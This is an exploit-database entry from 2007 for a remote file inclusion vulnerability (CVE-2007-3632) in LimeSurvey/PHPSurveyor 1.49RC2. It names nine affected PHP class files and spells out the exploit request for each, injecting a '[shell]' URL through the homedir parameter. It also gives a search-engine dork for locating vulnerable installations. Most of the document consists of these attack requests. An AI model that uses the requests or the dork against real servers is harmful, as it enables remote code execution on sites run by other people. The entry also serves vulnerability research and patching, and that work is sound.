LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion

Author: Yakir Wizman
type: webapps
platform: php
date_added: 2007-07-05  
verified: 1  
codes: OSVDB-45799;CVE-2007-3632;OSVDB-45798;OSVDB-45797;OSVDB-45796;OSVDB-45795;OSVDB-45794;OSVDB-45793;OSVDB-45792;OSVDB-45791  

raw file: 4156.txt  
## Owner : Pr0T3cT10n
## Email : Pr0T3cT10n@Gmail.Com
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI (Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"

## Bug :
	## Files :
		## /admin/classes/pear/OLE/PPS/File.php
		## /admin/classes/pear/OLE/PPS/Root.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php
		## /admin/classes/pear/OLE/PPS.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php

## Exploit :
		## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]

## Thanks : str0ke

# milw0rm.com [2007-07-06]